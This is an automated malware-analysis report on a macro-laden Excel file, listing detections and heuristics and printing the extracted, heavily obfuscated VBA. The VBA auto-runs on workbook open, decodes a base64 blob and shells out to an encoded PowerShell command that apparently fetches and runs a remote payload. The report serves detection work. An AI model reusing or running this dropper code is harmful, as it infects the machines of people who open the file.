MALICIOUS
290
Risk Score
Heuristics 8
-
ClamAV: Doc.Dropper.Agent-6442671-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6442671-0
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell ujJoUYppBnLKtVHRtxixsYzhpaFc(Urarx), MUtvfDszfbYaZLEjhyyOubCftNfWjbzuSMcguPfpdHlSYHXgTQzqcrilSOBRYWQDbeHNiYpRTIkmqjGmqyCTcJSberO -
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.Matched line in script
Set iHOiHJiuIfzPGQNWbRZjXJDRnskdpsAOTExqfZMVPmkHFZCBntvqS = CreateObject(AyqODGkLXOpPaguxEGttejNjezSjBgSMwRMcqnKZSAoVKxRSmxWNthKRlHkEoAJrwdSJTRGRwTa) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set iHOiHJiuIfzPGQNWbRZjXJDRnskdpsAOTExqfZMVPmkHFZCBntvqS = CreateObject(AyqODGkLXOpPaguxEGttejNjezSjBgSMwRMcqnKZSAoVKxRSmxWNthKRlHkEoAJrwdSJTRGRwTa) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub workbook_open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 17414 bytes |
SHA-256: b5bd099494eae0ac462153091a9f55c759c1a97cac54bf6b71143c65e53a6402 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
170 of 205 identifiers look randomly generated (e.g. 'yOZDxvOZEFQflwBTXqBEDUlYvLNpipvwKwUpYmhd') — consistent with name-mangling obfuscation. Carved artifact contains 5 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
UqmK.cVQOFprcPFwMmqjsixzl
Dim VsKsfPXcShbqXrMZLtiVCbttbUroaAvJBncjLXiqRPKheFovdKhp As Integer
If 57 = 32 Then
Dim OeitzQQLYjBRlRokOcOnKsDnRLOVfwKPTG As Date
Dim uXEjkuHWSiNswNREgAwteWavcnBugbYmyfWQffsTgoaVZYPBEbPJSZbYxJG As String
End If
Dim wsMqqJbuQqAYBIdNqvEVDYzqEMOTYDxTWYvbUxkLy As Integer
If 50 = 47 Then
Dim eyLEDNBpMlcsnDYsWldvHWNsgCcMBtsLtXZaolByNdLRVbi As Date
Dim UXixMGQqHkSYAkonTsRzQexEkjfheLvXFTIpTvgFcgRpWN As String
End If
Dim ANZprYDcRqZeNcbiMwpuTgcyUYMLWkNIiXiRIoTWTc As Integer
If 46 = 53 Then
Dim CRPpiDdtUUzbtTkaVTMsFhdQvptKaXdSbqeKjeqJi As Date
Dim dPsJHdOghSAKbXUoytsJTSwrhzDparrcCKcRkHoLedtFdH As String
End If
Dim zSJWklxzOKSBbHZZGqbXIRvCDqEgfqZrOaAlfEGGeDvSyjghlFXDdFziX As Integer
If 57 = 49 Then
Dim GSugRUYkbnBGotCjVsFVdDUKWuZSVNIaSN As Date
Dim YlMZNiXhXweaxLVTINuMuCyjJWuFPNeaobVQXveWywgXf As String
End If
Dim vxOxCFugGTVncQrnRSJSEmVqFwMiXNxWaENYgIMIjuiHzcu As Integer
If 42 = 37 Then
Dim fniheWFbJbYrGsMIsVzM As Date
Dim YCSHIFBiJDOrcBhvpgTzVdDwHRGPXmqlzPWcUaYYV As String
End If
Dim XRGNhOFKQTLCArvyWzrzlKXNcrNfEbOIvdyLxjaCBEGSej As Integer
If 39 = 43 Then
Dim zXadybgZkMtskpBZFpEDHWtjBmZpygEEj As Date
Dim tspEbdnbVtmRFykAbzROacceqcLBrbDHoJrwMVeMRc As String
End If
Dim lcGRvnopWhmqJQQKNyRlkuqecwHooGUEwyrzXY As Integer
If 51 = 58 Then
Dim hXNCEWUyzagBHgu As Date
Dim grqmcozgABQNitLZQmoRtXipUJewgHmynK As String
End If
Dim QGANvjhqNBnImEoBQPSPBIJBSTKDAsOS As Integer
If 32 = 51 Then
Dim ZYdEZCrEjCKhCLWZHfqXfXIIwyucZeqUmViObjb As Date
Dim NYNgyyczHwkvVCrmCPUIaIOfFMpvgcHxXDdyRrKKUznfoiV As String
End If
Dim SuigzGbAFJialIhSeonXRZsUKEKoaUjrXrXAx As Integer
If 43 = 34 Then
Dim vIqwDXpjRZBmhIrBKEtBNVvwnalZqDukgUjgwbOBClt As Date
Dim eJBtLspMmezkZMuJcmPsNeRGMZKFjqrycbQnlgZhBqHGhkJTBSlPns As String
End If
Dim gAsvglhkdwnAHywHXwMirXWKYbQrDRFbLjvQvpAnAQN As Integer
If 46 = 46 Then
Dim LTgdLXtuoDEBIdhWEVqhMrLpXCgMiwYhbKLrsyETJWQYGimmNTvS As Date
Dim KiAUHqFJqhMseXZyRpeFQWXpbmioPtyOAGXsJrjBtvccKX As String
End If
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "UqmK"
Dim AyqODGkLXOpPaguxEGttejNjezSjBgSMwRMcqnKZSAoVKxRSmxWNthKRlHkEoAJrwdSJTRGRwTa As String
Dim evsYhiAxEKESPHvrjDFlRqwZheHyUrERaHfVtjCWoDFgrLDBYaWNqiJnySqDaBcNFnrIb As String
Sub cVQOFprcPFwMmqjsixzl()
On Error Resume Next
Dim eSGCqpoYXcKtALsTkrxENLVaIIrIQvoAPtkttHsLjjdK As Integer
If 55 = 35 Then
Dim zstekkvneOlSxfthygH As Date
Dim bnKeHbyZdylVdhKbPPNXgAAWBHRvONKNCbBXpOmCmKRpssHknEeSkIa As String
End If
Dim bmnczJCLPoXSBfnlBdKlWiLdIzgIKjrcuAalCm As Integer
If 34 = 38 Then
Dim mtjzCAVaFFASdpaWEsaJUAcuAgwvYAFBiOqRCWgLIit As Date
Dim bIrGCCXwhLsSmQpyVEZCFzyjOzIUiMOAlGBlJZu As String
End If
Dim sAEXqqwEBMYKHigobKHsDtDOVwrgfODpwKhBAcHtRvHHJBHSFSZbBhqywq As Integer
If 30 = 52 Then
Dim CuyQYmIjOwBeozCNbImwEToZaNpcnOTiEJZNvAWVya As Date
Dim nLQbdZYoGiMAmiFYpKwgvzdSZeapSalRxdgdJzjQDzIkWEXrHXKMYRe As String
End If
Dim nhxBzzjVgxvCJBcOqagcwqswVHihvPZsfysvLxk As Integer
If 55 = 47 Then
Dim QTdcnaBNpeIUlsoixpAgrQBaQYDWKJgDtpPJTOEWTtsCmvnArQvG As Date
Dim KRtzSCLPXeCgyEbvcfOjkeMxXynVkCfuOasbwPqQCpypqMEhUrXLBLVgE As String
End If
bHkRfRbcBnpvdvZLEhgMKzufkERzpAAVdREtWbOUXtgJpdVsScpZrWKcMFgaAb
Dim vcTPqeUyIRXMzzNoyhufXHLuFBsfUtCEMXAnXBLKeqivgVUsKWDeaAg As Integer
If 42 = 33 Then
Dim oQZJompeOPTzbyZRwVkBhYQNkgzVypXdMqMWysXYoLTfNW As Date
Dim tukFGJqyzPALZImUfYrpnllDSEyLMVEkz As String
End If
Dim OnFktiNmNrwVmTPmUgunXiHIhmCLfldLQMKUgjmpdCZup As Integer
If 30 = 37 Then
Dim hfkiZrpJwbffxCGgCHcNlEaIuFltFKVJNSAHRcGtoBUkfojggJbvx As Date
Dim hEcEcoTGvEmGVReCyOZBiYjkqdFWENviZMgOXCp As String
End If
End Sub
Function ujJoUYppBnLKtVHRtxixsYzhpaFc(evwZFvXBHfAongtWeGVZwpvxjqrQQwHmzXFNbhCOgDLLjAMryguaUnao)
Dim omnswheJWFehvCtOIUsOzixCiJEgIlPfv As Integer
If 56 = 52 Then
Dim ZlOufmCLTiQafAggxYtf As Date
Dim opFplKndxAlpylVQeTchpCgzgbCIXALNVzHjfZJV As String
End If
Dim zYOSxbbuePBdvMqlJFIJHeFxpYTyemkFKHiQoNCFAIeIyhRJJVZ As Integer
If 57 = 39 Then
Dim aQAOUSQcYHcQsevTndZxvCDIyAxy As Date
Dim IGJpIMKoJsNxYldxXsleCNdgjYeXMrPTVRTSynHfUHKvPcZJYGlGPTv As String
End If
Dim iHOiHJiuIfzPGQNWbRZjXJDRnskdpsAOTExqfZMVPmkHFZCBntvqS
Dim vcdFkimcRducGSLzjkFKvDiQHzUyGGJEBWYpUiXxhesSVASrNHBVJJzstN As Integer
If 30 = 30 Then
Dim xkNnWLTpakuVeBNIcRKQuHgclyEousWgwHkmjtIgyga As Date
Dim ixrcAHBgihcTqElCXHeuhNOZXQaYjIeRN As String
End If
Dim gxetVDgtLnyTntiyrkZTlsVjSFjhdxaDLFJGGIBExB As Integer
If 39 = 49 Then
Dim VaPGjWrasYFxcocvbQTzQONvIikcri As Date
Dim iUWkXuUMVNpCFCyNcVeLhlkykGNUxBmPiJpkbsQibOvGKNJLwuFOygBxkYz As String
End If
AyqODGkLXOpPaguxEGttejNjezSjBgSMwRMcqnKZSAoVKxRSmxWNthKRlHkEoAJrwdSJTRGRwTa = "MS" & "XM" & "L2." & "DOMDocument"
Dim QhzOUaZUvNOlkEvjSqdnXxCXCvXRBIrzDsAAbAagltN As Integer
If 33 = 52 Then
Dim yiJUKCwiHGkcTecLZDHSnVOhsDvISPxCejEotaNPFZjtTQhWyoBdd As Date
Dim aacUbcGHnQsIiyjaoSyqsNNlUObWYJdOUYDJbTRyGIRJrkk As String
End If
Dim SxvKVDnlNMqzNAjidmeoJuayUBAjjvE As Integer
If 51 = 45 Then
Dim ukdJZdzHLhnpwlU As Date
Dim DxWanWNwbXWwqUDDBSIvPkqKEeeSGVFeNzxCMJI As String
End If
Dim hgnCmCgInHemXopETGLVIsuqFSsjqXAqsKaPbh As Integer
If 56 = 43 Then
Dim EIXVrKcjipXudvBnzpmxwUJxSPHn As Date
Dim tMOadlCCxnAjNVjCLvtFpELkcekkzaDbDopV As String
End If
Dim bxRrtyqLoCjbkGlWVBypBdxzBRDWjZf As Integer
If 37 = 48 Then
Dim YfOaOeCMrOzwZuJAspgGCqATyzS As Date
Dim qbuTbPXKvVfWsToGbChXErQKhDTdifucP As String
End If
Dim LLkwvXgCjNeNSomNjZRQbNzKklYwtcQbDHgHDKgeAU As Integer
If 46 = 38 Then
Dim UdmxPPgPyGcLoyMaLJzkJHxDJLHfKZsmQGsVYmWJPeeKyrSiudzWfQLNgin As Date
Dim DHBFZNqvhFrBZnpUecmESsZkgaWHAuepqzSBOZFxIwlcDcajpvhktdVLiRY As String
End If
Dim zriunbBLZVoFEXpwWHxgEAmREMtwMeGTxBFGZBxABRAOApcNDhyEkkU As Integer
If 42 = 44 Then
Dim zERqahFyvOVIDRjXUJwemzYQOjgsffCiMgGBHKXTw As Date
Dim SEzfhZvTJeuoGhzfAbqANTQLnvXLhPJmdiTvZlgKlZVBItGyHW As String
End If
Set iHOiHJiuIfzPGQNWbRZjXJDRnskdpsAOTExqfZMVPmkHFZCBntvqS = CreateObject(AyqODGkLXOpPaguxEGttejNjezSjBgSMwRMcqnKZSAoVKxRSmxWNthKRlHkEoAJrwdSJTRGRwTa)
Dim HjgSizoormCkluUILYOEGPufOnyPDupYDLIa As Integer
If 40 = 57 Then
Dim GKzUHktuIBnbgzihkDQroAEvBYkxwdgaltCBYtwVVAXMAXiDLHoAuR As Date
Dim mFFETiAvxfVNpmxgJqGvVodrudpglppfgUHwvUaOUaCrrmhvFfyxuyvx As String
End If
Dim cOJpsTKIqphUfBlpQrbvmlzHwtbGqrlhZJUhKkVBPtBCFNQEtJhCXALqOBt As Integer
If 34 = 56 Then
Dim zsDRyDzvVgEefWZfsjxCidWNhJjJYydSIrWIMbD As Date
Dim yFRvXpeBfxUTHRzKVVqkoTqWXDlVoAQTRgzwQi As String
End If
Dim yOZDxvOZEFQflwBTXqBEDUlYvLNpipvwKwUpYmhdywKhUcUdAiQCtlOedAImhYqPJTVpcLvkJXGHJDESrkpzYsCYhpMX
Dim zXCIELEfWBJgAnWrOePvXUDJNfhBBb As Integer
If 42 = 39 Then
Dim RDtnWShgPeSsgkMHzdxaRUgVKeTtuZeCdvjFnNRDJhOkcfnSwGfDEbJxWYc As Date
Dim rznmqAQOlBGUmLtQkFvsfqAwntaxBmmiOkZEVvYkMQCRpmt As String
End If
Dim rKKYrbfxAyrzxZSNzOYFBmpvphLgOojH As Integer
If 47 = 50 Then
Dim AAinqNvHjnYGevbKuDCCRhrFUPjJPziMO As Date
Dim kywqfWlTRWONjQtGAmLlgpTJdSadmsk As String
End If
Set yOZDxvOZEFQflwBTXqBEDUlYvLNpipvwKwUpYmhdywKhUcUdAiQCtlOedAImhYqPJTVpcLvkJXGHJDESrkpzYsCYhpMX = iHOiHJiuIfzPGQNWbRZjXJDRnskdpsAOTExqfZMVPmkHFZCBntvqS.createElement("ZyAAjwNlQhWbFau")
Dim EMruxeTOgRjALdskyqCOMXaiuenNMvHhYlJ As Integer
If 50 = 40 Then
Dim AsWvchXfUxpIfkhcnjdXhmJA As Date
Dim SrGBkJBbZUrscuZhprFkEWHcfTUxvObOjWdlaVuLvOiLto As String
End If
Dim AtJwipgYvvjdWQpEfLsdJFQoGTxupqnwjqTanzglhKbhBxzdVriXTPfu As Integer
If 55 = 52 Then
Dim cVpOsmjFIntfxOQgfGwyejnJUTYxHPdULZxSKRsubWZODTgHaBsMShQ As Date
Dim thgtZNlxsKZUYQyWNOBXIJZFBnRXGWRBdIEkdXThpYgDeyIqbffy As String
End If
evsYhiAxEKESPHvrjDFlRqwZheHyUrERaHfVtjCWoDFgrLDBYaWNqiJnySqDaBcNFnrIb = Chr(268 - 170) & Chr(182 - 77) & Chr(460 - 350) & Chr(311 - 265) & Chr(463 - 365) & Chr(118 - 21) & Chr(295 - 180) & Chr(369 - 268) & Chr(81 - 27) & Chr(107 - 55)
Dim RJHjIasmwNrVtXqPMNspuUhjdVaCebvarSkUAVcDfhlchLKHH As Integer
If 36 = 57 Then
Dim sdNmpDwcYGmApHURQeamWOrlpJMjF As Date
Dim BSLTvlxhoBPnrcPpDqaQKRgkUlemcxfr As String
End If
Dim NXXnbguVXkccLzfmcwmTmSvjlayKHKFqVYZUEbNWwFsapEZVFsKgKMEub As Integer
If 59 = 47 Then
Dim nCBikNMelGmZKhBiQWgaVugBdEOAZfJTe As Date
Dim sRYMnMrgvDymvvLJxupYUGtWzEfzMFFwTuSQ As String
End If
yOZDxvOZEFQflwBTXqBEDUlYvLNpipvwKwUpYmhdywKhUcUdAiQCtlOedAImhYqPJTVpcLvkJXGHJDESrkpzYsCYhpMX.DataType = evsYhiAxEKESPHvrjDFlRqwZheHyUrERaHfVtjCWoDFgrLDBYaWNqiJnySqDaBcNFnrIb
Dim cWcKpuZqiPhIDrclTvKlXCMigsTqyBSBcvgaSeiahCojXWwVdUdYkgsaK As Integer
If 40 = 32 Then
Dim texajsgxggHKBToMjEVOcLJwyNeYtQwDGQYAlAxKHmrqoKbAoMBbXLhiUAb As Date
Dim WNIDPjEDluoajHKHqUSHnmdjhPUgujqfk As String
End If
Dim YbwyjbHjHpGAlRUMEqNCtojkYVAOYJ As Integer
If 37 = 38 Then
Dim CEIpKfNIGsLYgwXjvxATpscdrjrMaNbtL As Date
Dim ynCrvHpzwkVrVInMoaCOFTKbfybnAhtRRMiJVszqLUtIHmWbEAlnYfFe As String
End If
yOZDxvOZEFQflwBTXqBEDUlYvLNpipvwKwUpYmhdywKhUcUdAiQCtlOedAImhYqPJTVpcLvkJXGHJDESrkpzYsCYhpMX.Text = evwZFvXBHfAongtWeGVZwpvxjqrQQwHmzXFNbhCOgDLLjAMryguaUnao
Dim daMxfByOqDZIaerwaMCkaBTsczjAwGsmGDgufC As Integer
If 51 = 32 Then
Dim KJVeRDMOBaIpMMcVEbGTVgRySkKmBWywQXBsPwj As Date
Dim QfNyJrGtgKlyEnLhesXLhsaNebMYpKjFIrqoHiIGMqebP As String
End If
Dim XtIEpXArkCXFAThfiDVafqNxXZvjQzqOyyGiDUzmjOXpTi As Integer
If 59 = 50 Then
Dim HOabenIAjhgLgQcQalLJGCMzcNEjr As Date
Dim RSYeoSgIpUDFxOZBrnjKSnldKcECby As String
End If
ujJoUYppBnLKtVHRtxixsYzhpaFc = yOZDxvOZEFQflwBTXqBEDUlYvLNpipvwKwUpYmhdywKhUcUdAiQCtlOedAImhYqPJTVpcLvkJXGHJDESrkpzYsCYhpMX.NodeTypedValue
Dim QiZJROIhrxvHlRIDInnykaUYZehuUMNehq As Integer
If 41 = 59 Then
Dim EUgoxKsKvmPKCUUGUROdOpNAjnhNNfjQauMnWTqdFafiJPcMZN As Date
Dim swPEcPGgFKcfxQCykHIhkAblYoKfrTKUnznmBVRxgqNfAZcPf As String
End If
Dim LfUEsdrVdgoEbolzHrxcQwOqLAtnvlyLvzgoqQvWwRXodsFBbgsie As Integer
If 44 = 59 Then
Dim mPOQetrkEasicJbIxJrvbgyZZMTvrLOsPgJkRXLXDmrreGBidseXBmD As Date
Dim FQprSawstLASvArrZxUspoHuTLkRygrqddDTcgtwGtyfenFhlB As String
End If
End Function
Sub bHkRfRbcBnpvdvZLEhgMKzufkERzpAAVdREtWbOUXtgJpdVsScpZrWKcMFgaAb()
MUtvfDszfbYaZLEjhyyOubCftNfWjbzuSMcguPfpdHlSYHXgTQzqcrilSOBRYWQDbeHNiYpRTIkmqjGmqyCTcJSberO = 0
Dim EZhuNQJuYHpetMTJpRxYOtDXlvqbPfFCf As Integer
If 59 = 38 Then
Dim wcSJjQmJhImHcAmMUynkNnKV As Date
Dim JIRaiesBmzwkBzGBKPglRQJvDPvgRSSJR As String
End If
Dim wAayLbCPlUdDBKUrmayHZEtzWWSjMjUgnTFzgDyndVgvgsCEaofrUC As Integer
If 47 = 41 Then
Dim rsGbboITDBAwQiFVLib As Date
Dim KdDXyTeUNJXEcMkbMsFbJeKSfvjbTzEdxQJYnUIHxTvJf As String
End If
Urarx = Urarx & "QwBtAEQAIAAmACAALwBDACAAQwBEACAAQwA6ACAAJgAgAFAATwBXAGUAUgBzAGgARQBsAGwAIAAtAGUAbgBDAG8AZABlAGQAQwBPAE0AbQBhAE4AZAAgAFoAZwBCADEAQQBHADQAQQBZAHcAQgAwAEEARwBrAEEAYgB3AEIAdQBBAEMAQQBBAFUAUQBCAHoAQQBFAHcAQQBjAEEAQgBCAEEARQBRAEEAWQB3AEIAYQBBAEYAbwBBAFQAZwBCAEYAQQBGAEkAQQBiAGcAQgA0AEEARwBJAEEAUQB3AEEAZwBBAEMAZwBBAEkAQQBBAGsAQQBIAG8AQQBUAGcAQgBpAEEARgBvAEEAYQBRAEIAagBBAEUAVQBBAFEAZwBCAE8AQQBGAFUAQQBXAGcAQgBJAEEARwBrAEEAYgBnAEIARABBAEYAawBBAGMAZwBCAHMAQQBHADQAQQBUAEEAQQBnAEEAQwB3AEEASQBBAEEAawBBAEgAQQBBAFIAdwBCAEwAQQBHADgAQQBUAHcAQgBXAEEASABRAEEAVABRAEIARgBBAEYAZwBBAFoAUQBCAGwAQQBHAFkAQQBZAFEAQgA2AEEASABJAEEAWgBRAEIAdQBBAEcATQBBAGIAdwBCAHYAQQBDAEEAQQBLAFEAQgA3AEEAQwBnAEEAVABnAEIAbABBAEgAYwBBAEwAUQBCAFAAQQBHAEkAQQB"
Dim wXkfHscGGRfTlsCjCBOEuHMCLnskxepjAmiXywLHcWqydFCcF As Integer
If 47 = 40 Then
Dim YuSgElpLiTTzsJc As Date
Dim bwSyJfkGpHcXQNYGkQeYjXCwBtMQcsHjNOXhnESanocZ As String
End If
Dim bNZxKNijOksEtVxQSUexztKBqqSgyDlvucUnTOFPJXVcWToRHBHSKfZiD As Integer
If 34 = 40 Then
Dim XHTuClKyxJQBJwEOPocXifXCBZwwSlPDljwHmUHmLdYKXQxEDEv As Date
Dim rxKVsjRtcoOgMtNPZAwcugqMEGNflcrsOqYFbOEXUbexw As String
End If
Urarx = Urarx & "hAGcAQgBsAEEARwBNAEEAZABBAEEAZwBBAEYATQBBAGUAUQBCAHoAQQBIAFEAQQBaAFEAQgB0AEEAQwA0AEEAVABnAEIAbABBAEgAUQBBAEwAZwBCAFgAQQBHAFUAQQBZAGcAQgBEAEEARwB3AEEAYQBRAEIAbABBAEcANABBAGQAQQBBAHAAQQBDADQAQQBSAEEAQgB2AEEASABjAEEAYgBnAEIAcwBBAEcAOABBAFkAUQBCAGsAQQBFAFkAQQBhAFEAQgBzAEEARwBVAEEASwBBAEEAZwBBAEMAUQBBAGUAZwBCAE8AQQBHAEkAQQBXAGcAQgBwAEEARwBNAEEAUgBRAEIAQwBBAEUANABBAFYAUQBCAGEAQQBFAGcAQQBhAFEAQgB1AEEARQBNAEEAVwBRAEIAeQBBAEcAdwBBAGIAZwBCAE0AQQBDAEEAQQBMAEEAQQBnAEEAQwBRAEEAYwBBAEIASABBAEUAcwBBAGIAdwBCAFAAQQBGAFkAQQBkAEEAQgBOAEEARQBVAEEAVwBBAEIAbABBAEcAVQBBAFoAZwBCAGgAQQBIAG8AQQBjAGcAQgBsAEEARwA0AEEAWQB3AEIAdgBBAEcAOABBAEkAQQBBAHAAQQBEAHMAQQBLAEEAQgBPAEEARwBVAEEAZAB3AEEAdABBAEUAOABBAFkAZwBCAHEAQQBHAFUAQQBZAHcAQgAwAE"
Dim xMQJAXEHbAKHxQlWmIzxVRWUHoLwZHTCtPGuwVkFnlmpOydySBiSeAbfp As Integer
If 38 = 37 Then
Dim wCMLHiUhHNiJqZRXuJkfgFILNdXZAXtob As Date
Dim FASYtfDSIHkvocbRukqqAIqtAyeKvgkU As String
End If
Dim tilZyzAdhNYyXQYAwHGnCxbwJZXuBtXcXQBFrBTvjMJmks As Integer
If 40 = 38 Then
Dim VkadNnawRvHoQYbFbnqwbHOSJvoKDp As Date
Dim noMREmUYgjCayFyCluTdkWwnQNVHTRyPtcIScyU As String
End If
Urarx = Urarx & "EAQwBBAEEATABRAEIAagBBAEcAOABBAGIAUQBBAGcAQQBGAE0AQQBhAEEAQgBsAEEARwB3AEEAYgBBAEEAdQBBAEUARQBBAGMAQQBCAHcAQQBHAHcAQQBhAFEAQgBqAEEARwBFAEEAZABBAEIAcABBAEcAOABBAGIAZwBBAHAAQQBDADQAQQBVAHcAQgBvAEEARwBVAEEAYgBBAEIAcwBBAEUAVQBBAGUAQQBCAGwAQQBHAE0AQQBkAFEAQgAwAEEARwBVAEEASwBBAEEAZwBBAEMAUQBBAGMAQQBCAEgAQQBFAHMAQQBiAHcAQgBQAEEARgBZAEEAZABBAEIATgBBAEUAVQBBAFcAQQBCAGwAQQBHAFUAQQBaAGcAQgBoAEEASABvAEEAYwBnAEIAbABBAEcANABBAFkAdwBCAHYAQQBHADgAQQBJAEEAQQBwAEEARABzAEEASQBBAEIAOQBBAEEAMABBAEMAZwBCADAAQQBIAEkAQQBlAFEAQgA3AEEAQQAwAEEAQwBnAEIAcgBBAEcAawBBAGIAQQBCAHMAQQBDAEEAQQBMAFEAQgB3AEEASABJAEEAYgB3AEIAagBBAEcAVQBBAGMAdwBCAHoAQQBHADQAQQBZAFEAQgB0AEEARwBVAEEASQBBAEIARgBBAEYAZwBBAFEAdwBCAEYAQQBFAHcAQQBPAHcAQQBnAEEAQQAwAEEAQ"
Dim olDHGuBIJUGJtrZERsYAqRNEOlmhWxgamaeshOptPFMnN As Integer
If 38 = 41 Then
Dim IFXTXqaDyeXXytVHUmMngXTMhXDCeklEarFfONzGGWowHVj As Date
Dim UUmvSzzgkmLmzmXZNsSxGnpsGmFhJjWFMoihspSEbKVtDbzUixaDo As String
End If
Dim XcgetpfuRXBPFaLDpgYaNVvSwpenlzLJTQoMBD As Integer
If 43 = 56 Then
Dim yzmKJnUdxBoQsRBcaCgOiEKsJSLswplzBm As Date
Dim hYoDMIySrdzUGuHqqmfnUuptArbchIPoOFjcoXpXQQMhtpLRkG As String
End If
Urarx = Urarx & "wBnAEEAawBBAEgATQBBAFcAQQBCAGgAQQBIAE0AQQBlAGcAQgAzAEEARwAwAEEAWQBnAEIAegBBAEcARQBBAFIAUQBCAFUAQQBIAFkAQQBZAFEAQgA1AEEARwBNAEEAVgBnAEIATgBBAEUAZwBBAGIAQQBCADIAQQBFAEkAQQBhAEEAQgBzAEEARgBVAEEAUABRAEEAawBBAEcAVQBBAGIAZwBCADIAQQBEAG8AQQBWAFEAQgBUAEEARQBVAEEAVQBnAEIAUQBBAEYASQBBAFQAdwBCAEcAQQBFAGsAQQBUAEEAQgBGAEEAQwBzAEEASgB3AEIAYwBBAEcAdwBBAFcAQQBCADEAQQBFAGcAQQBSAGcAQgBsAEEARwBrAEEAYwBBAEIAVgBBAEUAOABBAFEAdwBCADIAQQBGAGMAQQBaAEEAQgBoAEEARgBFAEEAZQBBAEIAdwBBAEMANABBAFoAUQBCADQAQQBHAFUAQQBKAHcAQQA3AEEAQQAwAEEAQwBnAEIAUgBBAEgATQBBAFQAQQBCAHcAQQBFAEUAQQBSAEEAQgBqAEEARgBvAEEAVwBnAEIATwBBAEUAVQBBAFUAZwBCAHUAQQBIAGcAQQBZAGcAQgBEAEEAQwBBAEEASgB3AEIAbwBBAEgAUQBBAGQAQQBCAHcAQQBIAE0AQQBPAGcAQQB2AEEAQwA4AEEAWQB3AEIAcwBB"
Dim yzTOSmjuCVhVkjNKGAKeBSwIWDhHALfJraJQUznwtuUUpufdTiiLGGFgDLs As Integer
If 48 = 47 Then
Dim PFctrpXeKZxpGNNlGxbSbXEnRcUCkVdMJHYrRBdfSQVDWscxtVy As Date
Dim ictQrAobOVUtowkgzpVUFUwALBBRZAWJPXvkQqgrc As String
End If
Dim ZPJxWhGlLcHXBsNgsFpzXCNyKeRBAQIIergEmCpUufNYOm As Integer
If 30 = 59 Then
Dim OehDXlrsFXBLmsQFlvTzsJMJuqPUE As Date
Dim ropjYPmUwtXQmlICaQwEpuREPuERXJhVWnNiMbOcdkoCwiFYDGTa As String
End If
Urarx = Urarx & "AEMANABBAGIAQQBCADUAQQBDADgAQQBNAFEAQgBQAEEARABJAEEAYwBRAEEAeABBAEUAYwBBAE0AUQBCAG4AQQBEAE0AQQBOAGcAQQB6AEEARgBBAEEATAB3AEIAawBBAEcAOABBAGQAdwBCAHUAQQBHAHcAQQBiAHcAQgBoAEEARwBRAEEATAB3AEIAQwBBAEYAbwBBAFMAQQBCAFEAQQBFAEkAQQBRAHcAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAGsAQQBIAE0AQQBXAEEAQgBoAEEASABNAEEAZQBnAEIAMwBBAEcAMABBAFkAZwBCAHoAQQBHAEUAQQBSAFEAQgBVAEEASABZAEEAWQBRAEIANQBBAEcATQBBAFYAZwBCAE4AQQBFAGcAQQBiAEEAQgAyAEEARQBJAEEAYQBBAEIAcwBBAEYAVQBBAE8AdwBBAE4AQQBBAG8AQQBEAFEAQQBLAEEASAAwAEEAWQB3AEIAaABBAEgAUQBBAFkAdwBCAG8AQQBIAHMAQQBmAFEAQQA9AA=="
Dim TQPxWlTdKUwmMBtyXaqzBTaEFPIgogNRqHCGYQLbHkRJoBquo As Integer
If 33 = 34 Then
Dim HAdQUYzpKrHcnpeGewEznaHOOrRCRPD As Date
Dim ZNshgkBWiDQNYEyUvnCJFluBgsPBdGxYuohPuIxWdZVwWNiKQWWO As String
End If
Dim OGxoTqAnUAtcFsSkWjanpgggPxfTJFkGkiKoqtvDHKBcgtqduynhwj As Integer
If 52 = 55 Then
Dim YiZRYVLhdPQmrXieudnW As Date
Dim ffeEAVHBZLRDKBKbPYUasZglMtCTvQEKtZDsDVRDOKISxM As String
End If
Dim bpMGOVINeGzssGSnFIHHJlyRYuHRMhQOozRMGpBiBgv As Integer
If 38 = 31 Then
Dim wtKcKkaFzKpDqrvhUOqBwplEsoGhQHYGdpBYORwglcRDyvbVL As Date
Dim HgUKeyHHFkVesosljaBqWTDRJPUYhGwNkWIaDvyquQIhaCsnZROVZfoodDB As String
End If
Dim PejaznItWgRhobKvGKWqHWgzPraoFiUwAtjLLqIt As Integer
If 36 = 48 Then
Dim SJWGHjauOjhdHMtsxkKIMUno As Date
